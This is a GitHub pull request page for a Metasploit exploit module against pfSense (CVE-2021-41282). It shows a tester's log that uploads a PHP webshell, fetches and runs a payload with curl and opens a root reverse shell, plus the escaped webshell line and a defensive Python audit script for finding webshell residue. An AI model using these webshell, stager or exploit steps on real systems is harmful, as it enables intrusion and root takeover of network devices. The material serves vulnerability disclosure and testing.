
pfSense Authenticated File Write (CVE-2021-41282) #16245

Merged
merged 1 commit into from
Mar 3, 2022

Conversation

jbaines-r7

Description

This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an authenticated user if they have the WebCfg - Diagnostics: Routing tables privilege. This module uses the vulnerability to create a web shell and execute payloads with root privileges.

pfSense's HTTP interface actually allows for arbitrary command execution by the admin user by default (which might be worth its own module), but it also has very granular permissions for other users - down to the specific page. The installation instructions discuss how to create a user that only has access to the routing diagnostics page.

For some reason, there are many of these internet facing (52kish).

The one thing I don't care for about this module is that it deviates from other pfSense modules' check implementations. The others extract the version string from the Dashboard view. However, that assumes the user has privileges to see the Dashboard, which isn't a prerequisite to exploit this issue. So I opted to write an exploit check, which could leave a file behind on the target 🤷

Two other less useful but worth throwing-out-there observations:

  1. No FreeBSD x64 Meterpreter? I could have used the php meterpreter here but it would have required even more steps.
  2. pfSense exploit modules are in modules/exploits/unix. I thought this belonged in modules/exploits/freebsd but I stashed this in unix with the others for consistency. 🤷

Verification

  • Follow the installation instructions included in the documentation.
  • Start msfconsole
  • use exploit/unix/http/pfsense_diag_routes_webshell
  • set username <name>
  • set password <password>
  • set RHOST <ip>
  • check
  • Verify the remote target is flagged as vulnerable
  • set LHOST <ip>
  • exploit
  • You should get a reverse shell

Video || GTFO

https://www.youtube.com/watch?v=cgtxDXJdtPY

PCAP || GTFO

pfsense_diag_reverse.zip

@bwatters-r7

For anyone making a test VM, pfsense does not always like the default SCSI hard drives. In the past on ESXi, I have needed to specify an IDE interface HDD controller for the boot device.

@bwatters-r7

Meh; I have a target for this. I'll grab it.
Testing:

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/unix/http/pfsense_diag_routes_webshell 
[*] Using configured payload bsd/x64/shell_reverse_tcp
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set username Router_Person
username => Router_Person
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set password v3Mpassword
password => v3Mpassword
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set rhost 10.5.132.210
rhost => 10.5.132.210
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set verbose true
verbose => true
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > check

[!] This exploit may require manual cleanup of '/usr/local/www/LWOSCyFTww' on the target
[+] 10.5.132.210:443 - The target is vulnerable.
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > show options

Module options (exploit/unix/http/pfsense_diag_routes_webshell):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DELETE_WEBSHELL  true             yes       Indicates if the webshell should be deleted or not.
   PASSWORD         v3Mpassword      yes       Password to authenticate with
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           10.5.132.210     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Me
                                               tasploit
   RPORT            443              yes       The target port (TCP)
   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loc
                                               al machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          8080             yes       The local port to listen on.
   SSL              true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)
   USERNAME         Router_Person    yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host
   WEBSHELL_NAME                     no        The name of the uploaded webshell. This value is random if left unset


Payload options (bsd/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   BSD Dropper


msf6 exploit(unix/http/pfsense_diag_routes_webshell) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(unix/http/pfsense_diag_routes_webshell) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading webshell to /wBJGlLFp.php
[*] Testing if web shell installation was successful
[+] Web shell installed at /wBJGlLFp.php
[*] Executing BSD Dropper for bsd/x64/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/zjZ0rfMGchKU1HR
[*] Local IP: http://10.5.135.101:8080/zjZ0rfMGchKU1HR
[*] Generated command stager: ["curl -so /tmp/ThloXvFa http://10.5.135.101:8080/zjZ0rfMGchKU1HR;chmod +x /tmp/ThloXvFa;/tmp/ThloXvFa;rm -f /tmp/ThloXvFa"]
[*] Client 10.5.132.157 (curl/7.74.0) requested /zjZ0rfMGchKU1HR
[*] Sending payload to 10.5.132.157 (curl/7.74.0)
[*] Command Stager progress - 100.00% done (120/120 bytes)
[+] Deleted /usr/local/www/NswJlxAR
[+] Deleted /usr/local/www/wBJGlLFp.php
[*] Command shell session 1 opened (10.5.135.101:4444 -> 10.5.132.157:7321 ) at 2022-03-01 09:14:31 -0600
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel)
ifconfig
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
	options=81009b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,VLAN_HWFILTER>
	ether 00:0c:29:c8:f6:1d
	inet6 fe80::20c:29ff:fec8:f61d%em0 prefixlen 64 scopeid 0x1
	inet 10.5.132.157 netmask 0xffffff00 broadcast 10.5.132.255
	media: Ethernet autoselect (1000baseT <full-duplex>)
	status: active
	nd6 options=23<PERFORMNUD,ACCEPT_RTADV,AUTO_LINKLOCAL>
em1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
	options=81009b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,VLAN_HWFILTER>
	ether 00:0c:29:c8:f6:27
	inet6 fe80::20c:29ff:fec8:f627%em1 prefixlen 64 scopeid 0x2
	inet 10.5.132.210 netmask 0xffffff00 broadcast 10.5.132.255
	media: Ethernet autoselect (1000baseT <full-duplex>)
	status: active
	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
enc0: flags=0<> metric 0 mtu 1536
	groups: enc
	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
	options=680003<RXCSUM,TXCSUM,LINKSTATE,RXCSUM_IPV6,TXCSUM_IPV6>
	inet6 ::1 prefixlen 128
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x4
	inet 127.0.0.1 netmask 0xff000000
	groups: lo
	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
pflog0: flags=100<PROMISC> metric 0 mtu 33160
	groups: pflog
pfsync0: flags=0<> metric 0 mtu 1500
	groups: pfsync
uname -a
FreeBSD pfSense.home.arpa 12.2-STABLE FreeBSD 12.2-STABLE 1b709158e581(RELENG_2_5_0) pfSense  amd64


print_status("Uploading webshell to #{webshell_location}")

# php_webshell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
php_shell = '\\x3c\\x3fphp+if($_GET[\\x22cmd\\x22])+\\x7b+system($_GET[\\x22cmd\\x22])\\x3b+\\x7d+\\x3f\\x3e'
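Review bot: the commented-out plaintext on the line above reads `isset($_GET["cmd"])`, but the escaped `php_shell` string decodes to `if($_GET["cmd"])` with no `isset`; keep the reference comment identical to what the encoded string actually writes, so a reviewer can verify the payload against the comment without decoding the `\x..` escapes by hand.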

We may want to consider something in the future to make this pattern of using a PHP webshell more reusable. Not something we need to handle in this PR but the pattern of dropping a webshell seems to be coming up more often.
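A defender-side audit tied to the residue this module leaves (the random-named file its check can leave behind and the `.php` webshell the exploit writes and then deletes), added here as an example that is not part of the module or the PR: it decodes the escaped payload quoted in the review comment above back to the plaintext PHP and scans a web root for that `system($_GET[...])` pattern or for unexpected random-named files. The web root path, the baseline set of expected files and the sample files are constructed assumptions.

```python
"""Audit a pfSense web root for the webshell/leftover pattern described in this PR.
Assumed, not from the module: the operator supplies the web root and a baseline file list."""
import os
import re
import tempfile

# Escaped payload as quoted in the review thread (Ruby's '\\' collapsed to a single '\').
ESCAPED_WEBSHELL = r'\x3c\x3fphp+if($_GET[\x22cmd\x22])+\x7b+system($_GET[\x22cmd\x22])\x3b+\x7d+\x3f\x3e'

# PHP handing a request parameter straight to a shell function.
WEBSHELL_RE = re.compile(r'\b(system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST)\b', re.I)
# Random-looking names like NswJlxAR / wBJGlLFp.php seen in the test log above.
RANDOM_NAME_RE = re.compile(r'^[A-Za-z]{8,}(\.php)?$')


def decode_escaped(payload: str) -> str:
    """Turn the \\xNN / '+' escaped form into the PHP text it writes on disk."""
    spaced = payload.replace('+', ' ')
    return re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), spaced)


def audit_webroot(webroot: str, known_files: set) -> dict:
    """Map filename -> reason for every file that looks like exploit residue."""
    findings = {}
    for name in sorted(os.listdir(webroot)):
        path = os.path.join(webroot, name)
        if not os.path.isfile(path):
            continue
        with open(path, 'rb') as fh:
            head = fh.read(4096).decode('latin-1')  # first 4 KiB covers a one-line shell
        if WEBSHELL_RE.search(head):
            findings[name] = 'webshell pattern'
        elif name not in known_files and RANDOM_NAME_RE.match(name):
            findings[name] = 'unexpected random-named file'
    return findings


def demo() -> dict:
    """Constructed web root: one legitimate page stub, the decoded webshell, a check leftover."""
    root = tempfile.mkdtemp()
    samples = {
        'interfaces.php': '<?php require_once("guiconfig.inc"); ?>',  # constructed stub
        'wBJGlLFp.php': decode_escaped(ESCAPED_WEBSHELL),
        'NswJlxAR': 'constructed leftover from the check\n',
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), 'w') as fh:
            fh.write(body)
    return audit_webroot(root, known_files={'interfaces.php'})


if __name__ == '__main__':
    print(demo())
```

The baseline set matters: legitimate pfSense pages such as `interfaces.php` also match the random-name regex, so compare against a listing taken from a clean install of the same version.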

@bwatters-r7 bwatters-r7 merged commit fb658fb into rapid7:master Mar 3, 2022
@bwatters-r7

Release Notes

This PR adds a module that exploits an authenticated arbitrary file creation vulnerability in the pfSense HTTP interface.

@jmartin-tech jmartin-tech added the rn-modules release notes for new or majorly enhanced modules label Mar 11, 2022